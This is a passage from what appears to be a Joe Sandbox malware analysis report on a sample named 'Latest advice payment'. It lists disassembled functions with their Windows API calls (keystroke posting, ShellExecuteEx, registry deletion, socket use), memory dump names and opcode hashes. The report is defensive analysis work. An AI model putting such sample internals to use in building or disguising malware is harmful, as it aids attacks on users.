                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 005E6257
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,005E902A,?,?,000000FF,00000000,?,000000FF,?), ref: 005E6291
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005E62B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 78082032d826048aca21b735b128f5afd4729508b27b6ec8b8ed75954d6552ee
                                                            • Instruction ID: 59e4ea4a044ba0c9b6d119401b98ea9685e5a258459e3369d8a952fe6cb34569
                                                            • Opcode Fuzzy Hash: 78082032d826048aca21b735b128f5afd4729508b27b6ec8b8ed75954d6552ee
                                                            • Instruction Fuzzy Hash: DB318D76100250BFEF198F51CC8AFEA3FA9FF597A5F044065FE889E191CA759841CB60
                                                            Function 005BBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: d7436da8bf074ee610d19c4bfe0a7a3a237dfb3e20faeb0d8d6330d142a63306
                                                            • Instruction ID: b9d6bf94f0582356cf0dd4b3c5cba6ef86f5ded319237e968bbb1398755424b6
                                                            • Opcode Fuzzy Hash: d7436da8bf074ee610d19c4bfe0a7a3a237dfb3e20faeb0d8d6330d142a63306
                                                            • Instruction Fuzzy Hash: 6A2160A2601A0A7BFA04B6119D43FFB7F5DBE50388F044414FE04A6647EFD8AE1283A5
                                                            Function 005CEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                              • Part of subcall function 0057FC86: _wcscpy.LIBCMT ref: 0057FCA9
                                                            • _wcstok.LIBCMT ref: 005CEC94
                                                            • _wcscpy.LIBCMT ref: 005CED23
                                                            • _memset.LIBCMT ref: 005CED56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: d7d5ae8b2d16b953405b5625e4bdc859ee38a29b4c8b3648ded60563a6b4092d
                                                            • Instruction ID: 13ba9a6c8c336ea4502b4e75453c04a5d0088102703f42cece6e9b5449d072bb
                                                            • Opcode Fuzzy Hash: d7d5ae8b2d16b953405b5625e4bdc859ee38a29b4c8b3648ded60563a6b4092d
                                                            • Instruction Fuzzy Hash: 51C15F715087469FC754EF64C88AE5ABBE4FF85314F04492DF8999B2A2DB30EC45CB42
                                                            Function 005D6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005D6C00
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005D6C21
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 005D6C34
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 005D6CEA
                                                            • inet_ntoa.WSOCK32(?), ref: 005D6CA7
                                                              • Part of subcall function 005BA7E9: _strlen.LIBCMT ref: 005BA7F3
                                                              • Part of subcall function 005BA7E9: _memmove.LIBCMT ref: 005BA815
                                                            • _strlen.LIBCMT ref: 005D6D44
                                                            • _memmove.LIBCMT ref: 005D6DAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: 699ab2435615fc28f25180418d585192421e8bb7d292520923101d39a150db15
                                                            • Instruction ID: baed9aa86a6f59e2cd0fc1aca8460066249473b9807fe78f8832d54ef7120629
                                                            • Opcode Fuzzy Hash: 699ab2435615fc28f25180418d585192421e8bb7d292520923101d39a150db15
                                                            • Instruction Fuzzy Hash: F981E371204301ABD720EB28DC8AE6ABBA9FFD4714F104A1EF5559B392DA70ED05CB51
                                                            Function 00561424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82997fb647df93c8fd14dff8e82e26d6a57ceb75ebd854d4a5b1884ae77b0013
                                                            • Instruction ID: 63e32537383bf43af1f969f6924ab0547ff7ae04376e655ac44ef773980bd3cb
                                                            • Opcode Fuzzy Hash: 82997fb647df93c8fd14dff8e82e26d6a57ceb75ebd854d4a5b1884ae77b0013
                                                            • Instruction Fuzzy Hash: F2714734900509EFDF14CF98CC89ABEBF79FF85311F188159E916AB251CB34AA51CBA4
                                                            Function 005EB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(01076498), ref: 005EB3EB
                                                            • IsWindowEnabled.USER32(01076498), ref: 005EB3F7
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 005EB4DB
                                                            • SendMessageW.USER32(01076498,000000B0,?,?), ref: 005EB512
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 005EB54F
                                                            • GetWindowLongW.USER32(01076498,000000EC), ref: 005EB571
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 005EB589
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: 7986497437708410a7ad847fc46c10bcf6ba076b0b27159fe25d6f3c45e0b7b9
                                                            • Instruction ID: 4e34bed662455853134c09e89b1e3bbd01053535e3a5f0ee26a2e745bd8133ce
                                                            • Opcode Fuzzy Hash: 7986497437708410a7ad847fc46c10bcf6ba076b0b27159fe25d6f3c45e0b7b9
                                                            • Instruction Fuzzy Hash: 5C71AD34600684AFEF299F56C8D5FBB7FB6FF09301F104469E982972A2C732A940DB50
                                                            Function 005DF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005DF448
                                                            • _memset.LIBCMT ref: 005DF511
                                                            • ShellExecuteExW.SHELL32(?), ref: 005DF556
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                              • Part of subcall function 0057FC86: _wcscpy.LIBCMT ref: 0057FCA9
                                                            • GetProcessId.KERNEL32(00000000), ref: 005DF5CD
                                                            • CloseHandle.KERNEL32(00000000), ref: 005DF5FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: f65a1325707c0a839f2e609beffdab2d6fd41dd139f0067266e14b3a6ad31dcf
                                                            • Instruction ID: 0936bb362f98f684fa8692737517b6e06946715c0f08eed77b1ff7df78416f58
                                                            • Opcode Fuzzy Hash: f65a1325707c0a839f2e609beffdab2d6fd41dd139f0067266e14b3a6ad31dcf
                                                            • Instruction Fuzzy Hash: 01616D75A0061ADFCF14EF98C4859AEBFB5FF89310F14846AE856AB351CB30AD41CB90
                                                            Function 005C0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 005C0F8C
                                                            • GetKeyboardState.USER32(?), ref: 005C0FA1
                                                            • SetKeyboardState.USER32(?), ref: 005C1002
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 005C1030
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 005C104F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 005C1095
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005C10B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 0e255aac45082183db4f29e0604ee922806b4d8556e4d448ab6378c20ed96c95
                                                            • Instruction ID: ef18224e75379c8cfe3f0920ecf58b091044aa00a58c05fd024fe201f0ce5151
                                                            • Opcode Fuzzy Hash: 0e255aac45082183db4f29e0604ee922806b4d8556e4d448ab6378c20ed96c95
                                                            • Instruction Fuzzy Hash: EC51D160504AD57EFB3642B48C59FBABEA97B07304F08858DE1D5958C3C298ACC8D755
                                                            Function 005C0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 005C0DA5
                                                            • GetKeyboardState.USER32(?), ref: 005C0DBA
                                                            • SetKeyboardState.USER32(?), ref: 005C0E1B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 005C0E47
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 005C0E64
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005C0EA8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005C0EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 3295af303ec311fe2a279dccf017f690e3ec1d95b0d532867f918051c030616f
                                                            • Instruction ID: 146020483c01e66dada1cb286223be1d0c94763798e22d3613b64c4a9bb33e85
                                                            • Opcode Fuzzy Hash: 3295af303ec311fe2a279dccf017f690e3ec1d95b0d532867f918051c030616f
                                                            • Instruction Fuzzy Hash: A651F4A05487D5BDFB3683B48C55F7ABFA97B06300F08988DE1D54A8C3C795AC98E760
                                                            Function 005C55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: 292ea9acc8eecbb7e8fe8ff2d41f6cb806d87842d05f0cf767a3fa244aa70bc9
                                                            • Instruction ID: 60513d0f06905d8e59171b758c9ed4f4a8dcc90420e5274be0d85e97e5aa31bc
                                                            • Opcode Fuzzy Hash: 292ea9acc8eecbb7e8fe8ff2d41f6cb806d87842d05f0cf767a3fa244aa70bc9
                                                            • Instruction Fuzzy Hash: E3418275C11615B6CB11FBF4884AACFBBB8BF44350F508956ED08F3221FA34A685C7A6
                                                            Function 005BD56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 005BD5D4
                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 005BD60A
                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 005BD61B
                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005BD69D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: ,,_$DllGetClassObject
                                                            • API String ID: 753597075-3938553195
                                                            • Opcode ID: 322994d56976fe31beec337dabff49344a7af8b741749d74556cba43e548cefb
                                                            • Instruction ID: e1f6982bf62749ea7b302753a4115c85cb576fed39888872d13bb3ce8dce8e02
                                                            • Opcode Fuzzy Hash: 322994d56976fe31beec337dabff49344a7af8b741749d74556cba43e548cefb
                                                            • Instruction Fuzzy Hash: 9D418EB5600209EFDB05CF54C884AEA7FB9FF48310F1580A9AD099F205EBB5E944DBB0
                                                            Function 005C3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005C3697,?), ref: 005C468B
                                                              • Part of subcall function 005C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005C3697,?), ref: 005C46A4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 005C36B7
                                                            • _wcscmp.LIBCMT ref: 005C36D3
                                                            • MoveFileW.KERNEL32(?,?), ref: 005C36EB
                                                            • _wcscat.LIBCMT ref: 005C3733
                                                            • SHFileOperationW.SHELL32(?), ref: 005C379F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: 1d7499f9e8961fc221d3c4bc500f8ec36293c47956d80d7d088e541f98ddc40b
                                                            • Instruction ID: eb21863ea6778a431960f0902ebd13b00479b10fb4e7a5cfa1b2250bc49f4690
                                                            • Opcode Fuzzy Hash: 1d7499f9e8961fc221d3c4bc500f8ec36293c47956d80d7d088e541f98ddc40b
                                                            • Instruction Fuzzy Hash: 6A417FB1508349AEC751EFA4C855EDF7BE8FF88380F00582EB499C7251EA34D689CB52
                                                            Function 005E7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005E72AA
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005E7351
                                                            • IsMenu.USER32(?), ref: 005E7369
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005E73B1
                                                            • DrawMenuBar.USER32 ref: 005E73C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: 059c554f2177ca9ebe44316c08d86d5562e9c504a11c4f2d59290d827f0c6fac
                                                            • Instruction ID: d122762c33f1f3899dfb58c47532eabac913faa3fc5c63bbc9b68418967f6b42
                                                            • Opcode Fuzzy Hash: 059c554f2177ca9ebe44316c08d86d5562e9c504a11c4f2d59290d827f0c6fac
                                                            • Instruction Fuzzy Hash: 1B415B75A00289EFDB24DF51D884AAABBF5FB0C310F14882AFD859B250C730AD10DF60
                                                            Function 005E0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 005E0FD4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005E0FFE
                                                            • FreeLibrary.KERNEL32(00000000), ref: 005E10B5
                                                              • Part of subcall function 005E0FA5: RegCloseKey.ADVAPI32(?), ref: 005E101B
                                                              • Part of subcall function 005E0FA5: FreeLibrary.KERNEL32(?), ref: 005E106D
                                                              • Part of subcall function 005E0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 005E1090
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 005E1058
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: 8fe27db2910a04b3035152885cbe5f31bf800d8955c6dfc98b8594eba664ea60
                                                            • Instruction ID: e8aa84eddf875bef7b0afded3ba1b8155170f00f8881c8a2aa7aee85281d1bd7
                                                            • Opcode Fuzzy Hash: 8fe27db2910a04b3035152885cbe5f31bf800d8955c6dfc98b8594eba664ea60
                                                            • Instruction Fuzzy Hash: 5D313A71D01149BFDB189F91DC89EFFBBBCFF08310F00016AE552A2141EA709E899BA4
                                                            Function 005E62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005E62EC
                                                            • GetWindowLongW.USER32(01076498,000000F0), ref: 005E631F
                                                            • GetWindowLongW.USER32(01076498,000000F0), ref: 005E6354
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 005E6386
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005E63B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 005E63C1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005E63DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: 868aa0252fff849bcc75370490e63f5a3a560c8e7c43a0a67488affffa6b853a
                                                            • Instruction ID: 2850a835ed513e7e3141433cacb1349b2ce72e85d0d0f7a0a13f86dc9e2fed1b
                                                            • Opcode Fuzzy Hash: 868aa0252fff849bcc75370490e63f5a3a560c8e7c43a0a67488affffa6b853a
                                                            • Instruction Fuzzy Hash: 3F312330640690AFDB38CF1ADC88F583BE1FB6A794F1805A4F591CF2B2CB71A8449B51
                                                            Function 005BDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005BDB2E
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005BDB54
